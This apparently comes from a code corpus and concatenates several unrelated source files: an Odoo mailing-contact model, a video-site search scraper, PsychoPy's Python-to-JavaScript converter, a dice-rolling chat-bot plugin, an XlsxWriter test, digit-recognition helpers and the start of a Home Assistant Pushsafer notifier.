dest_sftp.unlink(remotepath)
dest_sftp.rename(remote_tmp, remotepath)
if DEBUG:
print "ending write:", name, json_filename
dest_sftp.close()
dest_transport.close()
#print 'Upload done.'
| unlicense | 4,076,488,242,616,512,000 | 33.371429 | 92 | 0.635411 | false |
jrichte43/ProjectEuler | Problem-0121/solutions.py | 1 | 1722 |
__problem_title__ = "Disc game prize fund"
__problem_url___ = "https://projecteuler.net/problem=121"
__problem_description__ = "A bag contains one red disc and one blue disc. In a game of chance a " \
"player takes a disc at random and its colour is noted. After each " \
"turn the disc is returned to the bag, an extra red disc is added, and " \
"another disc is taken at random. The player pays £1 to play and wins " \
"if they have taken more blue discs than red discs at the end of the " \
"game. If the game is played for four turns, the probability of a " \
"player winning is exactly 11/120, and so the maximum prize fund the " \
"banker should allocate for winning in this game would be £10 before " \
"they would expect to incur a loss. Note that any payout will be a " \
"whole number of pounds and also includes the original £1 paid to play " \
"the game, so in the example given the player actually wins £9. Find " \
"the maximum prize fund that should be allocated to a single game in " \
"which fifteen turns are played."
import timeit
class Solution():
@staticmethod
def solution1():
pass
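        # A possible approach (sketch, not the author's solution): track the
        # distribution of blue-disc counts with exact fractions; at turn i
        # (1-based) the bag holds i + 1 discs, exactly one of them blue.
        #
        #   from fractions import Fraction
        #   turns = 15
        #   probs = [Fraction(1)]          # probs[k] = P(k blue discs so far)
        #   for i in range(1, turns + 1):
        #       p = Fraction(1, i + 1)
        #       probs = ([probs[0] * (1 - p)] +
        #                [probs[k] * (1 - p) + probs[k - 1] * p
        #                 for k in range(1, len(probs))] +
        #                [probs[-1] * p])
        #   p_win = sum(probs[turns // 2 + 1:])   # more blue than red
        #   prize = int(1 / p_win)   # largest whole-pound fund; 10 when turns == 4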
@staticmethod
def time_solutions():
setup = 'from __main__ import Solution'
print('Solution 1:', timeit.timeit('Solution.solution1()', setup=setup, number=1))
if __name__ == '__main__':
s = Solution()
print(s.solution1())
s.time_solutions()
| gpl-3.0 | 5,942,483,616,002,205,000 | 45.432432 | 100 | 0.5617 | false |
gurneyalex/odoo | addons/mass_mailing/models/mailing_contact.py | 5 | 5454 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import api, fields, models
from odoo.osv import expression
class MassMailingContactListRel(models.Model):
""" Intermediate model between mass mailing list and mass mailing contact
Indicates if a contact is opted out for a particular list
"""
_name = 'mailing.contact.subscription'
_description = 'Mass Mailing Subscription Information'
_table = 'mailing_contact_list_rel'
_rec_name = 'contact_id'
contact_id = fields.Many2one('mailing.contact', string='Contact', ondelete='cascade', required=True)
list_id = fields.Many2one('mailing.list', string='Mailing List', ondelete='cascade', required=True)
opt_out = fields.Boolean(string='Opt Out',
help='The contact has chosen not to receive mails anymore from this list', default=False)
unsubscription_date = fields.Datetime(string='Unsubscription Date')
message_bounce = fields.Integer(related='contact_id.message_bounce', store=False, readonly=False)
is_blacklisted = fields.Boolean(related='contact_id.is_blacklisted', store=False, readonly=False)
_sql_constraints = [
('unique_contact_list', 'unique (contact_id, list_id)',
'A contact cannot be subscribed multiple times to the same list!')
]
@api.model
def create(self, vals):
if 'opt_out' in vals:
vals['unsubscription_date'] = vals['opt_out'] and fields.Datetime.now()
return super(MassMailingContactListRel, self).create(vals)
def write(self, vals):
if 'opt_out' in vals:
vals['unsubscription_date'] = vals['opt_out'] and fields.Datetime.now()
return super(MassMailingContactListRel, self).write(vals)
class MassMailingContact(models.Model):
"""Model of a contact. This model is different from the partner model
because it holds only some basic information: name, email. The purpose is to
be able to deal with large contact list to email without bloating the partner
base."""
_name = 'mailing.contact'
_inherit = ['mail.thread.blacklist']
_description = 'Mailing Contact'
_order = 'email'
name = fields.Char()
company_name = fields.Char(string='Company Name')
title_id = fields.Many2one('res.partner.title', string='Title')
email = fields.Char('Email')
list_ids = fields.Many2many(
'mailing.list', 'mailing_contact_list_rel',
'contact_id', 'list_id', string='Mailing Lists')
subscription_list_ids = fields.One2many('mailing.contact.subscription', 'contact_id', string='Subscription Information')
country_id = fields.Many2one('res.country', string='Country')
tag_ids = fields.Many2many('res.partner.category', string='Tags')
opt_out = fields.Boolean('Opt Out', compute='_compute_opt_out', search='_search_opt_out',
                             help='Opt out flag for a specific mailing list. '
                                  'This field should not be used in a view without a unique and active mailing list context.')
@api.model
def _search_opt_out(self, operator, value):
# Assumes operator is '=' or '!=' and value is True or False
if operator != '=':
if operator == '!=' and isinstance(value, bool):
value = not value
else:
raise NotImplementedError()
if 'default_list_ids' in self._context and isinstance(self._context['default_list_ids'], (list, tuple)) and len(self._context['default_list_ids']) == 1:
[active_list_id] = self._context['default_list_ids']
contacts = self.env['mailing.contact.subscription'].search([('list_id', '=', active_list_id)])
return [('id', 'in', [record.contact_id.id for record in contacts if record.opt_out == value])]
else:
return expression.FALSE_DOMAIN if value else expression.TRUE_DOMAIN
@api.depends('subscription_list_ids')
def _compute_opt_out(self):
if 'default_list_ids' in self._context and isinstance(self._context['default_list_ids'], (list, tuple)) and len(self._context['default_list_ids']) == 1:
[active_list_id] = self._context['default_list_ids']
for record in self:
active_subscription_list = record.subscription_list_ids.filtered(lambda l: l.list_id.id == active_list_id)
record.opt_out = active_subscription_list.opt_out
else:
for record in self:
record.opt_out = False
def get_name_email(self, name):
name, email = self.env['res.partner']._parse_partner_name(name)
if name and not email:
email = name
if email and not name:
name = email
return name, email
@api.model
def name_create(self, name):
name, email = self.get_name_email(name)
contact = self.create({'name': name, 'email': email})
return contact.name_get()[0]
@api.model
def add_to_list(self, name, list_id):
name, email = self.get_name_email(name)
contact = self.create({'name': name, 'email': email, 'list_ids': [(4, list_id)]})
return contact.name_get()[0]
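    # Illustrative behaviour (an assumption about res.partner's name
    # parsing): name_create('John Doe <john@example.com>') splits into name
    # 'John Doe' and email 'john@example.com'; a bare 'john@example.com' is
    # used for both fields, per get_name_email() above.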
def _message_get_default_recipients(self):
return {r.id: {
'partner_ids': [],
'email_to': r.email_normalized,
'email_cc': False}
for r in self
}
| agpl-3.0 | 5,388,405,574,171,539,000 | 44.831933 | 160 | 0.632013 | false |
dannywxh/mypy | spider/avso.py | 1 | 5739 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os, re, time, sys
from bs4 import BeautifulSoup
import common
import requests
reload(sys)
#print sys.getdefaultencoding()
sys.setdefaultencoding('utf-8')
print sys.getdefaultencoding()
def download_html(url):
headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate, compress',
'Accept-Language': 'en-us;q=0.5,en;q=0.3',
'Cache-Control': 'max-age=0',
'Connection': 'keep-alive',
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0'}
print "download from "+url+"\n"
    response = requests.get(url=url, headers=headers, timeout=5)  # a basic GET request
#print "status_code",response.status_code
if response.ok:
#print response.content.encode("gbk")
#return StringIO.StringIO(response.content)
data=response.content
return data
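# Illustrative usage (hypothetical URL): download_html returns the raw page
# body, or None when the request fails, e.g.
#   html = download_html('https://example.com/')
#   if html:
#       soup = BeautifulSoup(html, 'html.parser')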
##### The following handles avso; it could be wrapped into a class #####
def get_cast_onepage_by_avso(cast_name,pagecount=1):
url=r'https://avso.pw/cn/search/'+cast_name+'/page/'+str(pagecount)
data=download_html(url)
if data:
#print response.content.encode("gbk")
soup = BeautifulSoup(data,"html.parser")
ret=[]
try:
            notfound=soup.find('div',class_="alert alert-danger")
if notfound!=None:
print "Not Found!"
return -1
divs=soup.find_all('div',class_="item")
if divs==None:
print "divs is None!"
return
for div in divs:
info=div.find('div',class_="photo-info")
name=div.find('span')
#print name.text
datas=info.find_all('date')
ret.append((name.text,datas[0].text,datas[1].text))
return ret
except Exception,e:
print e
return -1
#print "vcast not found!"
def get_cast_allpage_by_avso(cast_name):
all_info=[]
for i in range(1,10):
info= get_cast_onepage_by_avso(cast_name,i)
if info==-1:
break
else:
all_info+=info
print all_info
savefile="d:\\"+cast_name+".txt"
with open(savefile,"w") as fs:
for name,vid,date in all_info:
fs.write(name.encode("utf-8")+"\t"+vid+"\t"+date+"\n")
print "file create done!"
# step:1
def serch_movie_byvid(vid):
url='https://avso.pw/cn/search/'+vid
#url='https://avso.pw/cn/search/'+vid #110615_185'
data=download_html(url)
if data:
#print response.content.encode("gbk")
soup = BeautifulSoup(data,"lxml")
ret=[]
try:
notfound=soup.find('div',class_="alert alert-danger")
if notfound!=None:
print "Not Found!"
return -1
types = soup.select('div.item > a')
items = soup.select('div.item > a > div.photo-info > span')
for a,item in zip(types,items):
#print a['class'][1],a['href'],item.get_text() # ['movie-box', 'mcaribbeancom']
cast=get_movie_cast(a['href'])
ret.append((item.get_text(),cast,a['class'][1]))
return ret
except Exception,e:
print e
return -1
#print "vcast not found!"
#step 2: get all cast member names for the movie
def get_movie_cast(url):
# url=r' https://avso.pw/cn/movie/yus'
data=download_html(url)
ret=[]
if data:
soup = BeautifulSoup(data,"lxml")
try:
            notfound=soup.find('div',class_="alert alert-danger")
if notfound!=None:
print "Not Found!"
return -1
actress=soup.find_all('a',class_="avatar-box")
for a in actress:
span=a.find("span")
ret.append(span.text)
return " ".join(ret)
except Exception,e:
print e
return -1
#print "vcast not found!"
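# Editor's sketch (added): end-to-end lookup for one id, chaining
# serch_movie_byvid() and the per-movie cast scrape above. The id is only an
# example taken from the commented-out list in get_vidlist_full_info().
def _demo_serch_movie(vid='082516-001'):
    ret = serch_movie_byvid(vid)
    if ret != -1:
        for title, cast, tag in ret:
            print title, cast, tag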
#wrapper function
def get_vidlist_full_info():
#idlist=['082516-001','080117_01','062717_110']
idlist= walkpath(r"e:\\avstore")
print idlist
infos=[]
for id in idlist:
info = serch_movie_byvid(id)
if info!=-1:
infos+=info
#print infos
infofile='d:\\info.txt'
with open(infofile,"w") as f:
for a,b,c in infos:
print a,b,c
f.write(a+","+b+","+c+"\n")
print "File saved!%s"%infofile
def walkpath(path):
files=[x for x in os.listdir(path) if all([os.path.splitext(x)[1]=='.txt', not os.path.isdir(path+"\\"+x)])]
store=[]
for txtfile in files:
for line in open(path+"/"+txtfile):
p,f=os.path.split(line)
id=common.format_rule1(f.replace("\n",""))
if id!="":
#store.append((id,txtfile))
store.append(id)
return store
if __name__ == '__main__' :
#TXT_STORE_PATH="d:\\avstore\\"
get_vidlist_full_info()
# idlist=['082516-001','080117_01','062717_110']
#ret=serch_movie_byvid('082516-001')
#for a,b,c in ret:
# print a,b,c
| apache-2.0 | 8,082,208,100,537,435,000 | 24.361607 | 112 | 0.492871 | false |
psychopy/psychopy | psychopy/experiment/py2js.py | 1 | 7669 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Part of the PsychoPy library
# Copyright (C) 2002-2018 Jonathan Peirce (C) 2019-2021 Open Science Tools Ltd.
# Distributed under the terms of the GNU General Public License (GPL).
"""Converting code parameters and components from python (PsychoPy)
to JS (ES6/PsychoJS)
"""
import ast
import astunparse
import esprima
from os import path
from psychopy.constants import PY3
from psychopy import logging
if PY3:
from past.builtins import unicode
from io import StringIO
else:
from StringIO import StringIO
from psychopy.experiment.py2js_transpiler import translatePythonToJavaScript
class NamesJS(dict):
def __getitem__(self, name):
try:
return dict.__getitem__(self, name)
except:
return "{}".format(name)
namesJS = NamesJS()
namesJS['sin'] = 'Math.sin'
namesJS['cos'] = 'Math.cos'
namesJS['tan'] = 'Math.tan'
namesJS['pi'] = 'Math.PI'
namesJS['rand'] = 'Math.random'
namesJS['random'] = 'Math.random'
namesJS['sqrt'] = 'Math.sqrt'
namesJS['abs'] = 'Math.abs'
namesJS['randint'] = 'util.randint'
namesJS['round'] = 'util.round' # better than Math.round, supports n DPs arg
namesJS['sum'] = 'util.sum'
class TupleTransformer(ast.NodeTransformer):
""" An ast subclass that walks the abstract syntax tree and
allows modification of nodes.
This class transforms a tuple to a list.
:returns node
"""
def visit_Tuple(self, node):
return ast.List(node.elts, node.ctx)
class Unparser(astunparse.Unparser):
"""astunparser had buried the future_imports option underneath its init()
so we need to override that method and change it."""
def __init__(self, tree, file):
"""Unparser(tree, file=sys.stdout) -> None.
Print the source for tree to file."""
self.f = file
self.future_imports = ['unicode_literals']
self._indent = 0
self.dispatch(tree)
self.f.flush()
def unparse(tree):
v = StringIO()
Unparser(tree, file=v)
return v.getvalue()
def expression2js(expr):
"""Convert a short expression (e.g. a Component Parameter) Python to JS"""
# if the code contains a tuple (anywhere), convert parenths to be list.
# This now works for compounds like `(2*(4, 5))` where the inner
# parenths becomes a list and the outer parens indicate priority.
# This works by running an ast transformer class to swap the contents of the tuple
# into a list for the number of tuples in the expression.
try:
syntaxTree = ast.parse(expr)
except Exception:
try:
syntaxTree = ast.parse(unicode(expr))
except Exception as err:
logging.error(err)
return
for node in ast.walk(syntaxTree):
TupleTransformer().visit(node) # Transform tuples to list
        # for py2 using 'unicode_literals' we don't want bytes strings, so decode
if isinstance(node, ast.Str) and type(node.s)==bytes:
node.s = unicode(node.s, 'utf-8')
elif isinstance(node, ast.Str) and node.s.startswith("u'"):
node.s = node.s[1:]
if isinstance(node, ast.Name):
if node.id == 'undefined':
continue
node.id = namesJS[node.id]
jsStr = unparse(syntaxTree).strip()
if not any(ch in jsStr for ch in ("=",";","\n")):
try:
jsStr = translatePythonToJavaScript(jsStr)
if jsStr.endswith(';\n'):
jsStr = jsStr[:-2]
except:
# If translation fails, just use old translation
pass
return jsStr
def snippet2js(expr):
"""Convert several lines (e.g. a Code Component) Python to JS"""
# for now this is just adding ';' onto each line ending so will fail on
# most code (e.g. if... for... will certainly fail)
# do nothing for now
return expr
def findUndeclaredVariables(ast, allUndeclaredVariables):
"""Detect undeclared variables
"""
undeclaredVariables = []
for expression in ast:
if expression.type == 'ExpressionStatement':
expression = expression.expression
if expression.type == 'AssignmentExpression' and expression.operator == '=' and expression.left.type == 'Identifier':
variableName = expression.left.name
if variableName not in allUndeclaredVariables:
undeclaredVariables.append(variableName)
allUndeclaredVariables.append(variableName)
elif expression.type == 'IfStatement':
if expression.consequent.body is None:
consequentVariables = findUndeclaredVariables(
[expression.consequent], allUndeclaredVariables)
else:
consequentVariables = findUndeclaredVariables(
expression.consequent.body, allUndeclaredVariables)
undeclaredVariables.extend(consequentVariables)
elif expression.type == "ReturnStatement":
if expression.argument.type == "FunctionExpression":
consequentVariables = findUndeclaredVariables(
expression.argument.body.body, allUndeclaredVariables)
undeclaredVariables.extend(consequentVariables)
return undeclaredVariables
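# Editor's sketch (added): a tiny self-contained check of the walker above,
# assuming the same esprima-python parseScript() entry point used below.
def _example_find_undeclared():
    tree = esprima.parseScript('function f() { x = 1; if (x) { y = 2; } }')
    func = tree.body[0]  # the FunctionDeclaration node
    return findUndeclaredVariables(func.body.body, [])  # -> ['x', 'y']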
def addVariableDeclarations(inputProgram, fileName):
"""Transform the input program by adding just before each function
a declaration for its undeclared variables
"""
# parse Javascript code into abstract syntax tree:
# NB: esprima: https://media.readthedocs.org/pdf/esprima/4.0/esprima.pdf
try:
ast = esprima.parseScript(inputProgram, {'range': True, 'tolerant': True})
except esprima.error_handler.Error as err:
logging.error("{0} in {1}".format(err, path.split(fileName)[1]))
return inputProgram # So JS can be written to file
# find undeclared vars in functions and declare them before the function
outputProgram = inputProgram
offset = 0
allUndeclaredVariables = []
for expression in ast.body:
if expression.type == 'FunctionDeclaration':
# find all undeclared variables:
undeclaredVariables = findUndeclaredVariables(expression.body.body,
allUndeclaredVariables)
# add declarations (var) just before the function:
funSpacing = ['', '\n'][len(undeclaredVariables) > 0] # for consistent function spacing
declaration = funSpacing + '\n'.join(['var ' + variable + ';' for variable in
undeclaredVariables]) + '\n'
startIndex = expression.range[0] + offset
outputProgram = outputProgram[
:startIndex] + declaration + outputProgram[
startIndex:]
offset += len(declaration)
return outputProgram
if __name__ == '__main__':
for expr in ['sin(t)', 't*5',
'(3, 4)', '(5*-2)', # tuple and not tuple
'(1,(2,3), (1,2,3), (-4,-5,-6))', '2*(2, 3)', # combinations
'[1, (2*2)]', # List with nested operations returns list + nested tuple
'(.7, .7)', # A tuple returns list
'(-.7, .7)', # A tuple with unary operators returns nested lists
'[-.7, -.7]', # A list with unary operators returns list with nested tuple
'[-.7, (-.7 * 7)]']: # List with unary operators and nested tuple with operations returns list + tuple
print("{} -> {}".format(repr(expr), repr(expression2js(expr))))
| gpl-3.0 | 7,784,150,697,449,166,000 | 36.778325 | 129 | 0.61716 | false |
exp-publishing/cloudbot-plugins | plugins/gaming.py | 1 | 4430 | """
gaming.py
Dice, coins, and random generation for gaming.
Modified By:
- Luke Rogers <https://github.com/lukeroge>
- Josh Elsasser <https://github.com/jaelsasser>
License:
GPL v3
"""
import asyncio
import random
import re
from cloudbot import hook
whitespace_re = re.compile(r'\s+')
valid_diceroll = re.compile(r'^([+-]?(?:\d+|\d*d(?:\d+|F))(?:[+-](?:\d+|\d*d(?:\d+|F)))*)( .+)?$', re.I)
sign_re = re.compile(r'[+-]?(?:\d*d)?(?:\d+|F)', re.I)
split_re = re.compile(r'([\d+-]*)d?(F|\d*)', re.I)
def n_rolls(count, n):
"""roll an n-sided die count times
:type count: int
:type n: int | str
"""
if n == "F":
return [random.randint(-1, 1) for x in range(min(count, 100))]
if n < 2: # it's a coin
if count < 100:
return [random.randint(0, 1) for x in range(count)]
else: # fake it
return [int(random.normalvariate(.5 * count, (.75 * count) ** .5))]
else:
if count < 100:
return [random.randint(1, n) for x in range(count)]
else: # fake it
return [int(random.normalvariate(.5 * (1 + n) * count,
(((n + 1) * (2 * n + 1) / 6. -
(.5 * (1 + n)) ** 2) * count) ** .5))]
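# Editor's note (added): the "fake it" branches above sample a normal
# approximation of the dice sum; its parameters are the exact mean/variance
# of one fair n-sided die scaled by count, as computed here.
def _approx_roll_moments(count, n):
    """Mean and variance behind the normalvariate() fallback in n_rolls()."""
    mean = count * (n + 1) / 2.0
    var = count * ((n + 1) * (2 * n + 1) / 6.0 - ((n + 1) / 2.0) ** 2)
    return mean, var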
@asyncio.coroutine
@hook.command("roll", "dice")
def dice(text, notice):
"""<dice roll> - simulates dice rolls. Example: 'dice 2d20-d5+4 roll 2': D20s, subtract 1D5, add 4
:type text: str
"""
if hasattr(text, "groups"):
text, desc = text.groups()
else: # type(text) == str
match = valid_diceroll.match(whitespace_re.sub("", text))
if match:
text, desc = match.groups()
else:
notice("Invalid dice roll '{}'".format(text))
return
if "d" not in text:
return
spec = whitespace_re.sub('', text)
if not valid_diceroll.match(spec):
notice("Invalid dice roll '{}'".format(text))
return
groups = sign_re.findall(spec)
total = 0
rolls = []
for roll in groups:
count, side = split_re.match(roll).groups()
count = int(count) if count not in " +-" else 1
if side.upper() == "F": # fudge dice are basically 1d3-2
for fudge in n_rolls(count, "F"):
if fudge == 1:
rolls.append("\x033+\x0F")
elif fudge == -1:
rolls.append("\x034-\x0F")
else:
rolls.append("0")
total += fudge
elif side == "":
total += count
else:
side = int(side)
try:
if count > 0:
d = n_rolls(count, side)
rolls += list(map(str, d))
total += sum(d)
else:
d = n_rolls(-count, side)
rolls += [str(-x) for x in d]
total -= sum(d)
except OverflowError:
# I have never seen this happen. If you make this happen, you win a cookie
return "Thanks for overflowing a float, jerk >:["
if desc:
return "{}: {} ({})".format(desc.strip(), total, ", ".join(rolls))
else:
return "{} ({})".format(total, ", ".join(rolls))
@asyncio.coroutine
@hook.command("choice", "choose")
def choose(text, notice):
"""<choice1>, [choice2], [choice3], etc. - randomly picks one of the given choices
:type text: str
"""
choices = re.findall(r'([^,]+)', text)
if len(choices) == 1:
notice(choose.__doc__)
return
return random.choice(choices)
@asyncio.coroutine
@hook.command(autohelp=False)
def coin(text, notice, action):
"""[amount] - flips [amount] coins
:type text: str
"""
if text:
try:
amount = int(text)
except (ValueError, TypeError):
notice("Invalid input '{}': not a number".format(text))
return
else:
amount = 1
if amount == 1:
action("flips a coin and gets {}.".format(random.choice(["heads", "tails"])))
elif amount == 0:
action("makes a coin flipping motion")
else:
heads = int(random.normalvariate(.5 * amount, (.75 * amount) ** .5))
tails = amount - heads
action("flips {} coins and gets {} heads and {} tails.".format(amount, heads, tails))
| gpl-3.0 | 6,135,678,696,273,625,000 | 28.932432 | 104 | 0.499774 | false |
ivmech/iviny-scope | lib/xlsxwriter/test/comparison/test_outline04.py | 1 | 2728 | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013, John McNamara, [email protected]
#
import unittest
import os
from ...workbook import Workbook
from ..helperfunctions import _compare_xlsx_files
class TestCompareXLSXFiles(unittest.TestCase):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.maxDiff = None
filename = 'outline04.xlsx'
test_dir = 'xlsxwriter/test/comparison/'
self.got_filename = test_dir + '_test_' + filename
self.exp_filename = test_dir + 'xlsx_files/' + filename
self.ignore_files = ['xl/calcChain.xml', '[Content_Types].xml', 'xl/_rels/workbook.xml.rels']
self.ignore_elements = {}
def test_create_file(self):
"""
        Test the creation of outlines in an XlsxWriter file. These tests are
based on the outline programs in the examples directory.
"""
filename = self.got_filename
####################################################
workbook = Workbook(filename)
worksheet4 = workbook.add_worksheet('Outline levels')
levels = [
"Level 1", "Level 2", "Level 3", "Level 4", "Level 5", "Level 6",
"Level 7", "Level 6", "Level 5", "Level 4", "Level 3", "Level 2",
"Level 1"]
worksheet4.write_column('A1', levels)
worksheet4.set_row(0, None, None, {'level': 1})
worksheet4.set_row(1, None, None, {'level': 2})
worksheet4.set_row(2, None, None, {'level': 3})
worksheet4.set_row(3, None, None, {'level': 4})
worksheet4.set_row(4, None, None, {'level': 5})
worksheet4.set_row(5, None, None, {'level': 6})
worksheet4.set_row(6, None, None, {'level': 7})
worksheet4.set_row(7, None, None, {'level': 6})
worksheet4.set_row(8, None, None, {'level': 5})
worksheet4.set_row(9, None, None, {'level': 4})
worksheet4.set_row(10, None, None, {'level': 3})
worksheet4.set_row(11, None, None, {'level': 2})
worksheet4.set_row(12, None, None, {'level': 1})
workbook.close()
####################################################
got, exp = _compare_xlsx_files(self.got_filename,
self.exp_filename,
self.ignore_files,
self.ignore_elements)
self.assertEqual(got, exp)
def tearDown(self):
# Cleanup.
if os.path.exists(self.got_filename):
os.remove(self.got_filename)
if __name__ == '__main__':
unittest.main()
| gpl-3.0 | -6,489,329,900,518,712,000 | 31.47619 | 101 | 0.522727 | false |
prasunroypr/digit-recognizer | source/defs.py | 1 | 6607 | ################################################################################
"""
Functions for Digit Recognition
Created on Wed Jun 01 00:00:00 2016
@author: Prasun Roy
@e-mail: [email protected]
"""
################################################################################
# import modules
import matplotlib.pyplot as pplt
import numpy as np
import os
import pandas as pd
import skimage.feature as skim
import sklearn.preprocessing as pp
import time
from conf import _config
from conf import _configinfo
################################################################################
def _fscale(data, split=False, load=False, verbose=False):
# initialize scaler
scaler = pp.MinMaxScaler()
# initialize variables
config = _configinfo()
sdpath = config['root_data_path'] + 'scaled.npy'
# scale data
if verbose: print('scaling features............... ', end = '')
data = np.array(data, dtype='float64')
if load and os.path.isfile(sdpath):
m = np.load(sdpath)[0]
r = np.load(sdpath)[1]
r[r==0] = 1
data = (data - m) / r
elif split:
train = data[:config['train_d']]
valid = data[config['train_d']:]
scaler.fit(train)
m = scaler.data_min_
r = scaler.data_range_
train = scaler.transform(train)
valid = scaler.transform(valid)
data = np.vstack((train, valid))
else:
data = scaler.fit_transform(data)
m = scaler.data_min_
r = scaler.data_range_
if verbose: print('done')
# save scaled config
if not load: np.save(sdpath, np.vstack((m, r)))
# return scaled data
return data
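# Editor's sketch (added): typical two-step use of _fscale(); X_train and
# X_test are assumed to be NumPy arrays with the same number of columns.
def _fscale_example(X_train, X_test):
    X_train_scaled = _fscale(X_train, verbose=True)  # fits and persists min/range
    X_test_scaled = _fscale(X_test, load=True)       # reuses the persisted scaling
    return X_train_scaled, X_test_scaled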
################################################################################
def _haar(data, load=True, save=False, verbose=False):
    # Haar feature extraction is not implemented; data is passed through
    return data
################################################################################
def _hogs(data, load=True, save=False, verbose=False):
# initialize config
config = _config()
# initialize variables
datapath = config['hogs_data_path']
data_hog = []
# load hog data if exists
if load and os.path.isfile(datapath):
if verbose: print('loading descriptors............ ', end = '')
data_hog = np.load(datapath)
if verbose: print('done')
# calculate hog data otherwise
else:
# initialize variables
ix = config['shape_x']
iy = config['shape_y']
bn = config['bins_n']
cx = config['cell_x']
cy = config['cell_y']
bw = config['blok_w']
bh = config['blok_h']
# perform hog
t_beg = time.time()
size = data.shape[0]
loop = 0
for image in data:
if verbose: print('\rextracting descriptors......... %d%%'
%(loop*100//size), end = '')
desc = skim.hog(image.reshape(ix, iy), orientations=bn,
pixels_per_cell=(cx, cy), cells_per_block=(bw, bh))
data_hog.append(desc)
loop = loop + 1
data_hog = np.array(data_hog, dtype='float64')
t_end = time.time()
if verbose: print('\rextracting descriptors......... done @ %8.2f sec'
%(t_end - t_beg))
# save data
if save:
if verbose: print('saving descriptors............. ', end = '')
np.save(datapath, data_hog)
if verbose: print('done')
# return hog
return data_hog
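# Editor's sketch (added): descriptor for a single flattened image; the
# 28x28 shape and default skimage HOG settings are placeholders, the real
# values come from _config() as used in _hogs() above.
def _hog_one(image, ix=28, iy=28):
    return skim.hog(image.reshape(ix, iy))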
################################################################################
def _sift(data, load=True, save=False, verbose=False):
    # SIFT feature extraction is not implemented; data is passed through
    return data
################################################################################
def _surf(data, load=True, save=False, verbose=False):
    # SURF feature extraction is not implemented; data is passed through
    return data
################################################################################
def _plot(classifier, train, valid, step=None, save=False, verbose=False):
# initialize config
config = _config()
# initialize variables
if step is None: step = config['steps_d']
plot_figs_head = config['classifier'] + '-' + config['preprocess']
plot_data_path = config['plot_data_path']
plot_figs_path = config['plot_figs_path']
m_train = train.shape[0]
m_valid = valid.shape[0]
X_valid = valid[:, 1:]
y_valid = valid[:, 0]
error_train = []
error_valid = []
sizes_train = []
# calculate data for plot
for i in range(0, m_train, step):
if verbose: print('\rgenerating plot................ %d%%'
%(i*100//m_train), end = '')
# randomly shuffle training data
np.random.shuffle(train)
# select subset of randomized training data
X_train = train[:i+step, 1:]
y_train = train[:i+step, 0]
# train classifier with selected data
classifier.fit(X_train, y_train)
# cross-validate classifier
p_train = classifier.predict(X_train)
p_valid = classifier.predict(X_valid)
# estimate errors
error_train.append(sum(y_train != p_train) / len(y_train))
error_valid.append(sum(y_valid != p_valid) / m_valid)
sizes_train.append(i+step)
error_train = np.array(error_train, dtype='float64')
error_valid = np.array(error_valid, dtype='float64')
sizes_train = np.array(sizes_train, dtype='uint32')
if verbose: print('\rgenerating plot................ done')
# plot data
pplt.plot(sizes_train, error_train, 'rs-', label='training error')
pplt.plot(sizes_train, error_valid, 'gs-', label='cross-validation error')
pplt.title(plot_figs_head.upper()+' Learning Curve')
pplt.xlabel('number of training instances')
pplt.ylabel('classification error')
pplt.legend()
xmin,xmax = pplt.xlim()
ymin,ymax = pplt.ylim()
pplt.axis([xmin, xmax+step, ymin, ymax+0.01])
pplt.grid(True)
# save data
if save:
if verbose: print('saving plot.................... ', end = '')
data = pd.DataFrame({'x1_TrainSizes':sizes_train,
'y1_TrainError':error_train,
'y2_ValidError':error_valid})
data.to_csv(plot_data_path, index=False)
pplt.savefig(plot_figs_path)
if verbose: print('done')
# display plot
pplt.show()
################################################################################
| gpl-3.0 | -7,425,339,864,518,901,000 | 29.16895 | 80 | 0.49493 | false |
partofthething/home-assistant | homeassistant/components/pushsafer/notify.py | 1 | 6128 | """Pushsafer platform for notify component."""
import base64
import logging
import mimetypes
import requests
from requests.auth import HTTPBasicAuth
import voluptuous as vol
from homeassistant.components.notify import (
ATTR_DATA,
ATTR_TARGET,
ATTR_TITLE,
ATTR_TITLE_DEFAULT,
PLATFORM_SCHEMA,
BaseNotificationService,
)
from homeassistant.const import ATTR_ICON, HTTP_OK
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
_RESOURCE = "https://www.pushsafer.com/api"
_ALLOWED_IMAGES = ["image/gif", "image/jpeg", "image/png"]
CONF_DEVICE_KEY = "private_key"
CONF_TIMEOUT = 15
# Top level attributes in 'data'
ATTR_SOUND = "sound"
ATTR_VIBRATION = "vibration"
ATTR_ICONCOLOR = "iconcolor"
ATTR_URL = "url"
ATTR_URLTITLE = "urltitle"
ATTR_TIME2LIVE = "time2live"
ATTR_PRIORITY = "priority"
ATTR_RETRY = "retry"
ATTR_EXPIRE = "expire"
ATTR_ANSWER = "answer"
ATTR_PICTURE1 = "picture1"
# Attributes contained in picture1
ATTR_PICTURE1_URL = "url"
ATTR_PICTURE1_PATH = "path"
ATTR_PICTURE1_USERNAME = "username"
ATTR_PICTURE1_PASSWORD = "password"
ATTR_PICTURE1_AUTH = "auth"
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({vol.Required(CONF_DEVICE_KEY): cv.string})
def get_service(hass, config, discovery_info=None):
"""Get the Pushsafer.com notification service."""
return PushsaferNotificationService(
config.get(CONF_DEVICE_KEY), hass.config.is_allowed_path
)
class PushsaferNotificationService(BaseNotificationService):
"""Implementation of the notification service for Pushsafer.com."""
def __init__(self, private_key, is_allowed_path):
"""Initialize the service."""
self._private_key = private_key
self.is_allowed_path = is_allowed_path
def send_message(self, message="", **kwargs):
"""Send a message to specified target."""
if kwargs.get(ATTR_TARGET) is None:
targets = ["a"]
_LOGGER.debug("No target specified. Sending push to all")
else:
targets = kwargs.get(ATTR_TARGET)
_LOGGER.debug("%s target(s) specified", len(targets))
title = kwargs.get(ATTR_TITLE, ATTR_TITLE_DEFAULT)
data = kwargs.get(ATTR_DATA, {})
# Converting the specified image to base64
picture1 = data.get(ATTR_PICTURE1)
picture1_encoded = ""
if picture1 is not None:
_LOGGER.debug("picture1 is available")
url = picture1.get(ATTR_PICTURE1_URL, None)
